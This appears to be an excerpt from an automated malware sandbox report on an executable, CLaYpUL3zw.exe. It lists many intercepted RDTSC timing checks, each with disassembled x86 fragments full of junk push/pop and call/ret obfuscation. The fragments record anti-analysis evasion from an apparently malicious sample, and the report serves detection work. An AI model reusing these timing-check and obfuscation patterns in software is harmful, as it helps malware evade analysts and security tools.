                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F18D75 second address: F18E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FA030CAD677h 0x0000000d nop 0x0000000e mov esi, 01DA8FE9h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FA030CAD668h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f sub edi, dword ptr [ebp+122D3BCCh] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007FA030CAD668h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov edi, ebx 0x00000053 jmp 00007FA030CAD677h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c jnc 00007FA030CAD666h 0x00000062 pop esi 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F18E09 second address: F18E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1DC4F second address: F1DC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD675h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1DC6D second address: F1DC71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F20139 second address: F20148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1F32B second address: F1F3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FA030F107B8h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 cmc 0x00000017 mov ebx, dword ptr [ebp+122D1B7Fh] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov eax, dword ptr [ebp+122D0169h] 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FA030F107A8h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 mov di, ax 0x00000047 push FFFFFFFFh 0x00000049 add dword ptr [ebp+122D367Fh], esi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F22059 second address: F22076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FA030CAD66Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F22076 second address: F220D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov ebx, 4120F157h 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA030F107A8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FA030F107A8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 add edi, 7D1D10BAh 0x00000049 add ebx, 7DDCC029h 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F220D7 second address: F220DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F220DD second address: F220E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F23119 second address: F2311E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F23392 second address: F23396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2431E second address: F24322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F23396 second address: F2339A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F251C2 second address: F251E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD678h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F24322 second address: F24328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F24328 second address: F243E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jc 00007FA030CAD666h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f call 00007FA030CAD677h 0x00000014 jmp 00007FA030CAD66Fh 0x00000019 pop ebx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 jmp 00007FA030CAD676h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FA030CAD668h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov ebx, 7F6873FFh 0x0000004c mov eax, dword ptr [ebp+122D0BADh] 0x00000052 push 00000000h 0x00000054 push ebp 0x00000055 call 00007FA030CAD668h 0x0000005a pop ebp 0x0000005b mov dword ptr [esp+04h], ebp 0x0000005f add dword ptr [esp+04h], 00000017h 0x00000067 inc ebp 0x00000068 push ebp 0x00000069 ret 0x0000006a pop ebp 0x0000006b ret 0x0000006c mov bl, ch 0x0000006e push FFFFFFFFh 0x00000070 and ebx, 2227B4C4h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jno 00007FA030CAD666h 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F243E6 second address: F243EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F243EA second address: F243F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F25353 second address: F25359 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F25359 second address: F2536C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030CAD66Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F271E9 second address: F271EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F271EF second address: F27258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FA030CAD668h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov ebx, dword ptr [ebp+122D3A94h] 0x0000002e push 00000000h 0x00000030 adc bl, FFFFFF94h 0x00000033 xchg eax, esi 0x00000034 push esi 0x00000035 pushad 0x00000036 jmp 00007FA030CAD676h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F27258 second address: F27269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FA030F107ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F27269 second address: F2726D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F28373 second address: F2838D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA030F107B2h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2838D second address: F28418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FA030CAD668h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov bh, 34h 0x00000027 push 00000000h 0x00000029 mov edi, dword ptr [ebp+1244CB9Ah] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007FA030CAD668h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b pushad 0x0000004c call 00007FA030CAD675h 0x00000051 mov dword ptr [ebp+1245E305h], edx 0x00000057 pop eax 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FA030CAD679h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F28418 second address: F2842C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030F107B0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F29370 second address: F29375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F29375 second address: F293E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D327Dh], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FA030F107A8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+1245E512h], ebx 0x00000035 push 00000000h 0x00000037 js 00007FA030F107B0h 0x0000003d pushad 0x0000003e mov eax, dword ptr [ebp+122D3362h] 0x00000044 mov ecx, edx 0x00000046 popad 0x00000047 xchg eax, esi 0x00000048 jno 00007FA030F107B0h 0x0000004e push eax 0x0000004f push ebx 0x00000050 pushad 0x00000051 jmp 00007FA030F107AFh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2A2D4 second address: F2A2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2B3DC second address: F2B445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+122D3161h], ebx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FA030F107A8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FA030F107A8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a push eax 0x0000004b push eax 0x0000004c je 00007FA030F107ACh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2A4DF second address: F2A4E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2A4E4 second address: F2A4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2A5A2 second address: F2A5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2D3D3 second address: F2D3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2C501 second address: F2C507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2C507 second address: F2C511 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA030F107ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2D5B8 second address: F2D5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F2D5BD second address: F2D5E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b jp 00007FA030F107A6h 0x00000011 pop edi 0x00000012 pushad 0x00000013 jmp 00007FA030F107B3h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F18AC1 second address: F18AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F18AC5 second address: F18ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FA030F107ACh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F3D082 second address: F3D0AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD674h 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA030CAD66Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F42DFC second address: F42E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA030F107AFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F42E1C second address: F42E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F42E20 second address: F42E4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA030F107ABh 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007FA030F107A6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F42E4B second address: F42E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F42E4F second address: F42E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F42E55 second address: F42E66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030CAD66Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F42E66 second address: F42E86 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA030F107B1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4916C second address: F49170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F49170 second address: F49174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F49174 second address: F49180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F49180 second address: F4919B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107B7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4945A second address: F4947A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA030CAD666h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA030CAD673h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4947A second address: F49496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F49620 second address: F49624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4F29A second address: F4F29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4F29E second address: F4F2B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD672h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4F2B4 second address: F4F302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnc 00007FA030F107B9h 0x0000000e jmp 00007FA030F107B1h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007FA030F107B8h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4F302 second address: F4F306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4DD07 second address: F4DD0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4DD0B second address: F4DD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4DE7C second address: F4DE80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4DE80 second address: F4DEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA030CAD679h 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FA030CAD666h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4E2EE second address: F4E2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4E2F3 second address: F4E30A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA030CAD671h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4E30A second address: F4E30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4EB84 second address: F4EB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4EB8A second address: F4EB90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4EB90 second address: F4EB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4EB96 second address: F4EBB6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA030F107ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007FA030F107ABh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4EBB6 second address: F4EBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4ECF2 second address: F4ECF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F4F147 second address: F4F158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA030CAD66Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F5290E second address: F52912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F56CC4 second address: F56CE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007FA030CAD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FA030CAD66Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F55C89 second address: F55C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
